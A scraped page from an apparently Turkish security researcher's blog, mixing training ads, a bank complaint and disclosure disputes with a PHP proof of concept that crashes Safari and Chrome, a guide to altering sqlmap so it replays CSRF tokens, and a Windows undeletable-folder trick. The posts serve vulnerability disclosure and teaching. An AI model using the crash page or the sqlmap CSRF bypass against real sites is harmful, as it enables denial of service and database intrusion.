Featured Posts

<< >>

Python hakkında herşey

Merhaba arkadaşlar, Python öğrenmek isteyenlerin faydalanabileceği güzel bir kaynak. Türkçe olması yeni başlayanlar için en büyük avantaj. http://www.pythondersleri.com/

Garanti Bankası Rezil Hizmetinin Ses Kayıt’ı

Garanti Bankası Rezil Hizmeti.Resmen Vodafone ve Avea Kullanmayın dedi.       burada müşteri temsilcisinin göz ardı ettiği şey, suçlunun veya sorunun kimden kaynaklı olduğunun araştırılması ve giderilmesi konusunda çözüm

Mac OS X , iOS Chrome & Safari web browsers heap corruption bug

I think heap verify mechanism of Safari prevents the actual crash. PoC 1 –> http://ibrahimbalic.com/ios2/ PoC 2 –> http://ibrahimbalic.com/nets/ PHP code: <?php ob_start(“ob_gzhandler”); $ax = str_repeat(“aa/aa/./a”,2000000); ?> <html> <head> </head>

Sqlmap ile CSRF Bypass

Merhabalar,   Birçok güvenlik araştırmacısı penetrasyon testleri yaparken, zafiyet tespit edebilmek için veya tespit ettikleri zafiyetleri exploit edebilmek adına çeşitli araçlardan faydalanmaktadır. Bu araçlar genel olarak işlemleri otomatik hale getiriyor olsalar da kısmen

Baliç Bilişim Sitesi ve Eğitim İçerikleri Yenilendi.

Merhabalar, Baliç Bilişim’in websitesi ve eğitim içerikleri yenilendi. www.balicbilisim.com Android Temelleri Android Malware Analizi Android Adli-Bilişim Mac OS X ve iOS Temelleri Web Penetrasyon Testleri Mobil Penetrasyon Testleri Linux Temelleri

Python hakkında herşey

Merhaba arkadaşlar,

Python öğrenmek isteyenlerin faydalanabileceği güzel bir kaynak. Türkçe olması yeni başlayanlar için en büyük avantaj.

http://www.pythondersleri.com/

Garanti Bankası Rezil Hizmetinin Ses Kayıt’ı

Garanti Bankası Rezil Hizmeti.Resmen Vodafone ve Avea Kullanmayın dedi.

 

 

 

burada müşteri temsilcisinin göz ardı ettiği şey, suçlunun veya sorunun kimden kaynaklı olduğunun araştırılması ve giderilmesi konusunda çözüm üretici merci olarak benim Garanti bankasını müşteri temsilcisinin ise beni görüyor olmasıdır. Sorunun çözülüp hizmete dönüştürülmesi konusunda muhattabım garanti bankasıdır. Fakat ilgili yetkili kendisini haklı olduğuna o kadar inandırmış ki sanarsın mağdur olan garanti ve sebebi benim allah’ta benim belamı versin… Neyse hatalıysam email atın ( :

Mac OS X , iOS Chrome & Safari web browsers heap corruption bug

I think heap verify mechanism of Safari prevents the actual crash.

PoC 1 –> http://ibrahimbalic.com/ios2/

PoC 2 –> http://ibrahimbalic.com/nets/

PHP code:

<?php
ob_start(“ob_gzhandler”);
$ax = str_repeat(“aa/aa/./a”,2000000);
?>
<html>
<head>
</head>
<body>
<a http://<?php echo $ax;?>” id=”test”>test</a>
</body>
</html>

 

 

Crash:

Expected Results:
0:000:x86> .frame /r
00 0042e294 60b8cdfc CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x90
eax=00000000 ebx=06fb2d90 ecx=00000061 edx=00000000 esi=4bc90020 edi=0ab60c40
eip=60b982d7 esp=0042e284 ebp=0042e294 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x90:
60b982d7 66890c42 mov word ptr [edx+eax*2],cx ds:002b:00000000=????
0:000:x86> ub .
CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x73:
60b982ba c3 ret
60b982bb 33c0 xor eax,eax
60b982bd 3944240c cmp dword ptr [esp+0Ch],eax
60b982c1 7e1f jle CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x9b (60b982e2)
60b982c3 8b4c2404 mov ecx,dword ptr [esp+4]
60b982c7 0fb60c08 movzx ecx,byte ptr [eax+ecx]
60b982cb 668b0c4dc898c260 mov cx,word ptr CoreFoundation!_CFDefaultEightBitStringEncoding+0x1a8 (60c298c8)[ecx*2]
60b982d3 8b542408 mov edx,dword ptr [esp+8]

 

Sqlmap ile CSRF Bypass

Merhabalar,

 

Birçok güvenlik araştırmacısı penetrasyon testleri yaparken, zafiyet tespit edebilmek için veya tespit ettikleri zafiyetleri exploit edebilmek adına çeşitli araçlardan faydalanmaktadır. Bu araçlar genel olarak işlemleri otomatik hale getiriyor olsalar da kısmen yetersiz kaldıkları durumlar veya güvenlik denetimlerine takıldıkları zamanlar vardır. Bu başlık altında SQLMap aracını kullanarak CSRF(Cross-site Request Forgery) için alınmış bir dizi önlemi bypass etmenin yollarına deyineceğim.

ttttaaa

 

Burada kullanılan CSRF mekanizmasının çalışma anatomisine göz atacak olursak, Server’ın, Client için gönderdiği cevapta (response) sayfa içerisindeki formlar için random bir token oluşturulmuş. Server Client’tan gelecek olan her istek için bu token değerini beklemektedir. Eğer bu token gönderilirse, Istek(request) için Cevap(response) verilecektir. Sayfa her yenilendiğinde (her request için) o sayfaya özel uniq bir token oluşturulmakta ve yapılacak istek için bu token beklenmektedir.

 

SQLMap aracının bu seneryo/mekanizma içerisinde kullanacağımızı düşünürsek, yapılacak atack’ın başarısız olacağını hemen anlayabiliriz.SQLMap’ın bu seneryo içerisinde server için yapacağı her istek içerisinde server için bir token göndermesi gerekmektedir. Bu tip bir durum için SQLMap içerisinde yapılacak ufak bir kaç değişiklik ile SQLMap için bu yetenek kazandırılabilinir.

Hedefimiz SQLMap aracığını çalışma mekanizmasını değiştirmek suretiyle yapacağı her istek(request) öncesinde Server’dan ilgili token değerini alıp, yapacağı bir sonraki istek(request) içerisinde bu token’ı kullanması. Bu sebeple bulmamız gereken öncelikli şey SQLMap aracının istek yapmış olduğu modül.

https://github.com/sqlmapproject/sqlmap/blob/master/lib/request/connect.py

SQLMap aracı biraz incelediğimizde yapılan her istek için connect.py içerisinde bulunan getPage functionını kullandığını açıkça görebilmekteyiz. Seneryomuza göre yapılacak her işlem için SQLMap aracının server ile iletişim sağlaması ise bu function içerisinde değişiklik yapmamız bizim için yeterli olacaktır.

Seneryomuza göre şimdiki hedefimiz server’ın client için oluşturduğu token’ı sayfa içerisinde tespit etmek. Bunu anlamak için giden trafiği veya sayfa içerisinde source code’un incelenmesi faydalı olacaktır.

Bizim örneğimizde __RequestVerificationToken değeri içerisinde gidip geldiğini görüyoruz.

 

fffkret

Server’ın client için oluşturduğu random token’ın tutulduğu input değerini tespit ettik, Şimdiki hedefimiz sunucuya kendi cookie değerimiz ile istekte(request) bulunup, bize göndermiş olduğu cevap(response) içerisinde __RequestVerificationToken değerini alıp, SQLMap içerisinde gönderilecek post değeri içerisine yerleştirmek.

connectpy

 

Yukarıda görmüş olduğunuz gibi connect.py içerisinde getpage functionında değişiklikler yaptım, 1. aşama olarak server için kendi cookie değerimi set ediyorum ve 2. aşamada bu cookie değeri ile server’a istek yapıyorum(request). 2. aşamada server’ın bana göndermiş olduğu cevap(response) içerisinde aradığım __RequestVerificationToken değerini parçalıyorum(parse ediyorum). Bu değeri alıp 4 aşamada SQLMap’in post parametresinin içerisindeki csrfid değişkeni ile server’dan aldığım değişkeni yer değiştiriyorum. Bu sayede SQLMap yapacağı her istek içerisinde server’a requestverification token yollamış oluyor.
ffffa

Sqlmap içerisinde __RequestVerificationToken parametresinin değerini csrfid olarak verdiğim için her istekte alınan request token burayla yer değiştirilecektir.

Bu mantık ile farklı uygulamalarda farklı denetimleri bypass edebilirsiniz.

Herkese iyi çalışmalar dilerim

İbrahim

Baliç Bilişim Sitesi ve Eğitim İçerikleri Yenilendi.

Merhabalar,

Baliç Bilişim’in websitesi ve eğitim içerikleri yenilendi.

www.balicbilisim.com

Windows Directory Bug

Hi Guys,

I’d like to share a weird story with you.

Today, I found this interesting bug/issue in Windows OS. earlier I tested on Windows 8.1(x64), Windows 7(x64) and Windows Sever 2008 R2 (x64). I think they are present in all versions of its windows OS.

However Im not certain why this issue occured but I think it minght be related with NTFS.

Due to this issue the created folders are unable to be deleted.

mkdir “test /. /test”

windows_1

windows_2

windows_3

windows_4

if you created a file in folder, same file gets created in both folder also if any one of the folder is deleted, remaing file get corrupted.

windows_5

windows_6

Siber Güvenlik Konferansı 2014 İstanbul

https://lh6.googleusercontent.com/-rVac6pQsrRE/UoyzBYokSbI/AAAAAAAADmQ/-V5xJYnhVPQ/w140-h133-p/SGD-LOGO-RGB.jpg
Siber Güvenlik Konferansı 2014 İstanbul

Geçtiğimiz yıllarda dünyaya damgası vuran ve siber dünyadan gelebilecek tehditlere karşı önemini daha çok hissettiren siber güvenlik, siber casus yetiştirme politikaları, siber savaşlar ve bu alana yönelik olarak ülkelerin bütçelerinden ayırdıkları hatırı sayılır oranlara ulaşan rakamlar, siber güvenlik kavramını bireysel, kurumsal ve ülke güvenliği açısından kritik öneme kavuşturmuştur. Siber Güvenlik Derneği tarafından düzenlenecek olan Siber Güvenlik Konferansı bu eksendeki soru ve sorunlara çözüm önerileri sunmayı hedeflemektedir.

http://www.siberguvenlikkonferansi.org/

 

New generation brute force attacks

Hi guys,

Soon I will be sharing a method for brute force attacks. I tested on most of the big companies(Apple, Google, Microsoft etc.) which it worked well. I tried on over 20.000+ times password on any account and there seemed to be no problem occurring.

I have reported this issues to Google and Apple so i will be sharing these information’s when I get a reply from those companies and when its fixed.(i will not report to microsoft because they gave a bad experience to me in the past..)

I believe that many other company’s system has the same issue which must be fixed soon as possible.

For now I only have a response from google, i will publish it when i hear from apple.
googlePermissions

Android Eğitimi

Merhaba arkadaşlar,

Android OS & Android Uygulama geliştirme eğitimimiz devam ediyor.

Eğitim Tarihleri:
26 Nisan Cumartesi – 27 Nisan Pazar 2014 (1. sınıf)
Eğitim Yeri :
Atalar(kartal) / İstanbul
Eğitim Katılım Ücreti :
700 TL  (1 kişi )

iletişim :
ibrahim@balicbilisim.com
+90216 387 87 99
+90538 722 33 73

 

1. Android’e Genel Bakış.
2. Android Nedir?
3. Android Mimarisi
3.1.1. Android Internals
3.1.1.1.1. Applications
3.1.1.1.2. Application Framework
3.1.1.1.3. Libraries
3.1.1.1.4. Android Runtime(Core Libraries & Dalvik & ART )
3.1.1.1.5. Linux Kernel
3.1.2. Android APIs
3.1.2.1.1. PackageManager
3.1.2.1.2. Power Manager
3.1.2.1.3. Activity Manager
3.1.2.1.4. Alarm Manager
3.1.2.1.5. Window Manger
3.1.2.1.6. Bluetooth Service
3.1.2.1.7. Location Manager
3.1.2.1.8. Telephony Manager
3.1.2.1.9. ….
3.1.3. Android Data Storages
3.1.3.1.1. Internal Storage
3.1.3.1.2. External Storage
3.1.3.1.3. Shared Preferences
3.1.3.1.4. Network
3.1.3.1.5. SQLite
3.1.3.1.6. ..
4. Lab Ortamının Kurulumu & Ayarları
4.1.1. Ortam Araçları
4.1.1.1.1. Android SDK
4.1.1.1.2. Eclipse
4.1.1.1.3. Intellij IDEA
4.1.2. Android Tools & Debugging
4.1.2.1.1. Android Debug Bridge ( adb )
4.1.2.1.2. Android Asset Packaging Tool ( aapt )
4.1.2.1.3. Dalvik Debug Monitor Server ( ddms )
4.1.2.1.4. Network Trafik Analizi
4.1.2.1.5. Logcat, Dumpsys
5. Egzersiz
5.1.1. 3 Adet Uygulama Geliştirme
5.1.2. 3 Adet Uygulama Analiz

 

* Eğitime katılacak öğrencilerin kimlik kartları ile birlikte gelmeleri şartıyla katılım ücretinde %40 indirim uygulanacaktır.
** Her sınıf için 1 kişilik ücretsiz öğrenci kontenjanımız vardır.(maddi durumu iyi olmayan arkadaşlar için)
*** Eğitime katılacak katılımcıların1 adet windows işletim yüklü taşınabilir bilgisayar getirmeleri zorunludur.

Göya Apple ve Google Yalanlamış?

Bazı kişi ve kişiler adıma karşı uzun zamandır karalama kampanyası başlattılar. Yaptıklarıma karşı yalan yanlış, kaynak belirtmeksizin birşeyler yazıp ciziyorlar. Onlara sadece gülüyorum.

Öncelikle apple ile alakalı olarak kesinlikle belirtmek istiyorum ki Apple şirketi konuya karşı “iyi” yada “kötü” hiç bir resmi açılamada bulunmadı.

Apple şirketi prösedür’ü gereği resmi olarak sadece şu sayfada http://support.apple.com/kb/ht1318 ilgili zafiyeti bildiren kişilerin adını ve zafiyetin türünü belirtmektedir.

Bunları ben değil, Apple söylüyor;

2013-07-29 iCloud.com/mail

A stored cross-site scripting issue was addressed. We would like to acknowledge Ibrahim BALIC (Balich IT – www.balicbilisim.com) for reporting this issue.

2013-07-25 developer.apple.com

A stored cross-site scripting issue was addressed. We would like to acknowledge Ibrahim BALIC (Balich IT – www.balicbilisim.com) for reporting this issue.

2013-07-25 itunesconnect.apple.com

Nine stored cross-site scripting issues were addressed. We would like to acknowledge Ibrahim BALIC (Balich IT – www.balicbilisim.com) for reporting these issues.

2013-07-23 iCloud.com/calendar

A stored cross-site scripting issue was addressed. We would like to acknowledge Ibrahim BALIC (Balich IT – www.balicbilisim.com) for reporting this issue.

2013-07-22 iadworkbench.apple.com

An information disclosure issue was addressed. We would like to acknowledge Ibrahim BALIC (Balich IT – www.balicbilisim.com) for reporting this issue.

 

Şu günlerde ise bu insanlar aynı karalama kampanyasını Google şirketi için başlattılar.
Allah aşkına soruyorum, söylesinler; Google şirketi bu açıklamaları nerede yapmış? bana kaynak göstersinler yeter…

Herkes çok iyi hatırlar ki, Olayı ben değil Apple şirketi kendi duyurmuştu ve O günlerde Apple şirketi kendi kullanıcılarına kendisi şu emaili göndermişti.

appleolayi

 

Burada açıkca görüldüğü üzere Apple ilgili olayda uygulama geliştirici(developer)’in adının(name), soyadının(surname), email id ve apple idlerine ulaşıldığını şifrelerin güven altında olduğunu açıklamıştı.

Bunların hiç birini ben söylemedim, Apple şirketi kendisi bildirmişti.

Ben olayı ve tüm bu süreçte ulaştığım o belgeleri bu video’da paylaşmıştım.

Bu video’yada açıkca gözüktüğü gibi konuyla alakalı olarak benim ulaştığım Ad,soyad ve apple idleri açıkca görebilirsiniz.

Ama bazı kötü niyetli kişiler,özelliklede hiç bir kaynak göstermeksizin hiç bir mantıklı açıklama yapmaksızın adıma karşı karalama kampanyası yürütüyorlar. Yaptıkları açıklamada Apple şirketinin durumu inkar ettiğini dile getiriyorlar, Şayet böyle bir resmi kaynakları varsa bunu herkesle paylaşmaları gerekiyor aksi takdirde kaynak göstermeksizin bu tip söylemlerde bulunmalarının hiç bir mantikli açıklaması bulunmamaktadır.

Yine bazı kişiler kaynak göstermeksizin bu olayın code execution’dan olayı kaynaklandığını belirtiyorlar, Eğer code execution’ın zafiyeti ile neler yapılabileneceğini biliyor olsaydınız emin olun Code Execution gerçekleştirilen bir sunucuda kullanıcı adı, soyadı ve email adreslerinin alınmayacağını çok iyi bilirler. (şayet apple şirketi kullanıcı bilgilerini plain text olarak metin belgesinin içinde saklamıyorsa… lol)

Code Execution gerçekleştirmek demek o sunucuda kod çalıştırabilmek demektir. Tabikide bu tip zafiyetler çok tehlikeli olabilmektedir fakat bunu gerçekleştiren kişi komple server’ın kontrolünü ele geçirebilir sadece ad,soyad,email adresi almaz vs vs.

Apple olayı geçti gitti bu karalama yapanların kıskançlıkları dindi derken üstüne google olayı ile yine kudurdular, Google Olayı inkar etti diyorlar… Allah aşkına google nerede ve ne zaman açıklama yapmış? Ne demiş bir açıklasınlarda tüm dünya bilse?

Google konu ile alakalı “sorunlar giderildi dışında” hiçbir resmi açıklama yapmamıştır.

https://support.google.com/googleplay/android-developer/known-issues/24493?hl=en

Sadece ilgili sorunların giderildiğini açıklamıştır bunun dışında hiç bir açıklamada bulunulmadı. Ben konuyu, konuyla alakalı tüm kanıtları ortaya koydum.

Google için yaptığım zafiyet bildirimi, rapor idsi ve tarihini buradan açıkca görebilirsiniz.

 

asdasdas

 

Olayların başlangıç tarihini ve insanların yazdıkları yorumları buradan görebilirsiniz:

https://code.google.com/p/android/issues/detail?id=67226

 

Aksini kanıtlayacak veya iddaa edicek herkes için ben burdayim fakat yalan yanlış hiç bir kaynak belirtmeksizin yaptıkları saldırıların sadece ve sadece tek amacı vardır oda karalamaktır.

İbrahim